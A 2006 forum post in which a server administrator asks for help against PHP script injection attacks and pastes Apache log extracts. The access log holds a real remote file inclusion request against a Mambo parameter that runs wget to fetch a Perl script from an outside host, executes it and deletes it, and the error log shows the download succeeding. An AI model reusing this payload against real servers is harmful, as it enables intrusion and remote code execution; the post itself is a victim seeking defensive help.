View Single Post
  #1  
Old 16th July 2006, 01:15
Grizzly Grizzly is offline
Member
 
Join Date: Feb 2006
Posts: 41
Thanks: 0
Thanked 0 Times in 0 Posts
Default php script injections

server being attacked by script injections I have already chmod wget but attacks still continue and seem to be getting more advanced need help securing the server

extract from logfile /var/log/apache2/access_log

82.77.174.39 - - [16/Jul/2006:00:33:30 +0200] "GET /index.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://66.90.88.178/tool.gif?&cmd=cd%20/tmp/;wget%20http://66.90.88.178/mambo.txt;perl%20mambo.txt;rm%20-rf%20mambo.*? HTTP/1.0" 404 1181 "-" "Mozilla/5.0"

extract from logfile /var/log/apache2/error_log

[Sat Jul 15 22:20:45 2006] [error] an unknown filter was not added: PHP
[Sat Jul 15 22:20:45 2006] [error] an unknown filter was not added: PHP
--22:20:55-- http://66.90.88.178/mambo.txt
=> `mambo.txt'
Connecting to 66.90.88.178:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 16,282 (16K) [text/plain]

0K .......... ..... 100% 7.77 KB/s

22:20:58 (7.77 KB/s) - `mambo.txt' saved [16282/16282]

kill: usage: kill [-s sigspec | -n signum | -sigspec] [pid | job]... or kill -l [sigspec]
[Sat Jul 15 22:41:53 2006] [warn] child process 13552 still did not exit, sending a SIGTERM
[Sat Jul 15 22:41:53 2006] [warn] child process 30607 still did not exit, sending a SIGTERM


Need help advice anything...

Thank you in advance
Reply With Quote
Sponsored Links